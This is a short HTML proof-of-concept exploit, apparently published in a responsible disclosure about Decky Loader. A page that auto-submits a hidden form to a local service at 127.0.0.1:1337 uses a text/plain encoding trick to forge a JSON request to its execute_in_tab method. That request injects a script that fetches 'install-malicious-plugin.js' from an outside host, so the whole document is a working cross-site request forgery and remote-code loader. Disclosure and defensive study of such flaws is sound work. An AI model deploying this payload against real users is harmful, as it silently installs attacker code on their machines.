<form id="F" action="http://127.0.0.1:1337/methods/execute_in_tab" method="post" enctype="text/plain">
    <input name='{"tab":"SP","run_async":false,"code":"var x=document.createElement(\"script\");x.setAttribute(\"src\",\"https://git.sr.ht/~scrumplex/responsible-disclosure/blob/master/2022-08-decky-loader/install-malicious-plugin.js\"),document.head.appendChild(x);/*' value='*/"}'>
</form>
<script>
    document.getElementById("F").submit();
</script>
